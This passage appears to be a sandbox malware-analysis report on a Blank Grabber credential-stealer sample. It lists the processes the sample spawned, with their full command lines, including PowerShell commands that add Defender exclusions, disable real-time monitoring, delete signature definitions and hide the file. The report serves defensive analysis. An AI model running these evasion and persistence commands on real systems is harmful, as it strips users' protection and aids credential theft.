                                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2030787005.0000020AB3901000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2473117545.0000020AB3C0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2467713655.0000020AB46E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()""
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'
                                                                                                                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                            Imagebase:0x7ff78c900000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"
                                                                                                                                                                                                                                                            Imagebase:0x7ff6316c0000
                                                                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                                                                            MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                                            Start time:10:17:57
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                            Imagebase:0x7ff6c8e70000
                                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                                            Start time:10:17:59
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                                            Start time:10:17:59
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                                            Start time:10:18:00
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                                                            Imagebase:0x7ff748520000
                                                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                                            Start time:10:18:00
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                                            Start time:10:18:00
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                                            Start time:10:18:00
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                                                            Imagebase:0x7ff748520000
                                                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                                            Start time:10:18:00
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                                            Start time:10:18:00
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                                            Start time:10:18:01
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                            Imagebase:0x7ff6c8e70000
                                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                                            Start time:10:18:02
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                                            Start time:10:18:02
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                                            Start time:10:18:03
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                            Imagebase:0x7ff6c8e70000
                                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                                            Start time:10:18:04
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\Resource.exe""
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                                            Start time:10:18:04
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                                            Start time:10:18:04
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                                            Start time:10:18:04
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                                            Start time:10:18:04
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:attrib +h +s "C:\Users\user\Desktop\Resource.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff75d3f0000
                                                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                                            Start time:10:18:04
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'
                                                                                                                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                            File size:452'608 bytes
